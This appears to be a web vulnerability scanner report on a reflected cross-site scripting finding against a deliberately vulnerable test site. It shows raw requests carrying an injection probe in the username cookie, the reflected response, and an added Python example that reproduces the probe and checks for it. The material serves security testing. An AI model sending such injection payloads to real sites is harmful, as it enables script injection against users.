</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b>arachni_name</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea></b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<!-- App libs -->
<script src="/static/app/app.js"></script>
<script src="/static/app/libs/sessvars.js"></script>
<script src="/static/app/post.js"></script>
<script src="/static/app/controllers/controllers.js"></script>
<script src="/static/app/services/itemsService.js"></script>
<script src="http://bxss.s3.amazonaws.com/ad.js"></script>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /logout HTTP/1.1
Host: testhtml5.vulnweb.com
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Cookie: username=admin
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 302 FOUND
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 07:00:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Connection: keep-alive
Location: http://testhtml5.vulnweb.com/
Set-Cookie: username=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/">/</a>. If not click the link.
Vector: cookie input `username`, sent using GET, found at http://testhtml5.vulnweb.com/login and pointing to http://testhtml5.vulnweb.com/.

| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
| cookie | http://testhtml5.vulnweb.com/login | http://testhtml5.vulnweb.com/ | username=admin; Path=/ | |
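The probe visible in the injected Cookie header and the reflection it produced in the navbar can be reproduced without the scanner. The following Python is an added example, not Arachni's code and not the test site's: it builds the same `</textarea>--><xss_SEED/><!--<textarea>` marker, renders the `Welcome <b>...</b>` fragment the way the vulnerable page does beside an entity-encoded version, and applies the check that decides whether the marker landed as a live element. The scan seed is the one from the report's X-Arachni-Scan-Seed header; the two render functions are assumptions standing in for the site's real template.

```python
import html
import re

# Scan seed taken from the report's X-Arachni-Scan-Seed header.
SCAN_SEED = "0c25785427908905790d3a663dc49fa7"

# Navbar fragment quoted from the report's response body (the reflection
# that produced the finding); used below to validate the check.
REPORT_SNIPPET = (
    "Welcome <b>admin</textarea>--><xss_0c25785427908905790d3a663dc49fa7/>"
    "<!--<textarea></b> | <a href='/logout'>Logout</a>"
)


def build_probe(seed: str) -> str:
    """Arachni-style element-injection probe.

    It first closes a <textarea> and an HTML comment so that the marker
    element still ends up in a live HTML context if the reflection point
    happens to sit inside one of those; a trailing <!--<textarea> then
    swallows whatever markup follows the reflection.
    """
    return f"</textarea>--><xss_{seed}/><!--<textarea>"


def render_navbar_vulnerable(username: str) -> str:
    """Assumed stand-in for the site's template: the cookie value is
    concatenated into the markup with no output encoding (the defect)."""
    return f"Welcome <b>{username}</b> | <a href='/logout'>Logout</a>"


def render_navbar_fixed(username: str) -> str:
    """Same fragment with the value entity-encoded for HTML element content."""
    safe = html.escape(username, quote=True)
    return f"Welcome <b>{safe}</b> | <a href='/logout'>Logout</a>"


def marker_is_live(body: str, seed: str) -> bool:
    """True when the marker survived as a real tag, i.e. the body contains a
    literal <xss_SEED/> (or <xss_SEED>) element rather than its
    entity-encoded form. Searching for the bare seed would be wrong: a
    correctly encoded reflection still contains the seed as text."""
    pattern = re.compile(rf"<xss_{re.escape(seed)}\s*/?>", re.IGNORECASE)
    return pattern.search(body) is not None


def check_cookie_reflection(render, seed: str) -> dict:
    """Drive one render function with the probe as the cookie value and
    report the payload used and whether it executed as markup."""
    probe = build_probe(seed)
    body = render(probe)
    return {"payload": probe, "body": body, "vulnerable": marker_is_live(body, seed)}


if __name__ == "__main__":
    for name, render in (("vulnerable", render_navbar_vulnerable),
                         ("fixed", render_navbar_fixed)):
        result = check_cookie_reflection(render, SCAN_SEED)
        print(f"{name}: vulnerable={result['vulnerable']}")
        print("  " + result["body"])
```

Note that the cookie reaches the server with its angle brackets intact because the report's request sends it without percent-encoding; a browser would normally not store such a value from a Set-Cookie, which is why the report reproduces the attack with a raw request rather than through the UI.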
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Host: testhtml5.vulnweb.com
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Cookie: username=admin</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea>
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:58:20 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b>admin</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea></b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<!-- App libs -->
<script src="/static/app/app.js"></script>
<script src="/static/app/libs/sessvars.js"></script>
<script src="/static/app/post.js"></script>
<script src="/static/app/controllers/controllers.js"></script>
<script src="/static/app/services/itemsService.js"></script>
<script src="http://bxss.s3.amazonaws.com/ad.js"></script>
</body>
</html>
Transitions describe the steps required to restore the page to the state it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time (s) | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
| 6 | 0.800369 | click | `<a href="#/archive" data-arachni-id="916551842">` | |
| 7 | 0.355032 | request | http://testhtml5.vulnweb.com/static/app/partials/archive.html | |
| 8 | 0.250829 | request | http://testhtml5.vulnweb.com/ajax/archive | |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="55824100"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* 
arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class=""><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li class="active"><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> Showing last <b>50</b> items </div> </div> <!-- ngRepeat: item in items | filter:searchText --><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> blog.github.com </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. 
